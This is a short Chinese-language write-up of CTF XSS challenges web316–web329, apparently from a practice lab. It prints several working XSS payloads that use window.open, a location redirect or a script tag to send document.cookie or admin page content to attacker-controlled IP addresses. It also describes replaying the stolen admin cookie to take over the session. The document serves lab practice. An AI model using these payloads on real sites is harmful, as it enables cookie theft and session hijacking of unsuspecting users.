web316-web326
首先用xss平台实验了下
没有flag,群主说要生成连接,然后后台会有个机器人点一下
呢咱们就生成连接
<input onfocus="window.open('http://121.4.162.152:8888/'+document.cookie)" autofocus>
然后用咱们的vps监听端口
然后flag 就出来了
详细绕过姿势看这个大佬博客
<body onload="window.location.href='http://121.4.162.152:8888/'+document.cookie"></body>
他能一直杀下去…
web327
变成存储型的了
我拿xss平台试试, 收信人是admin,不是老明…
xss平台接受不到啊,不知道咋回事
我还是继续用反射性的办法
web328
是个注册界面
发现管理员能看到用户名和密码
我们注册一个,用xss代码注册
<script>window.open('http://121.4.162.152:8888/'+document.cookie)</script>
然后返回一个cookie,我们换成管理员cookie
然后刷新下,发现Flag
web329
和上面一样的界面,都可以执行
问题在于他的cookie一直在变
思路:我们让他直接发过来整个页面
<script>window.open('http://118.31.168.198:39543/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
师傅们用的这种办法,我不太懂
我想着是xss平台可以看到管理员页面的截图
然后就实验了下,确实可行
点开可以看大图
哦哦,发现代码在这,我裂开了,一会x的上一会插不上。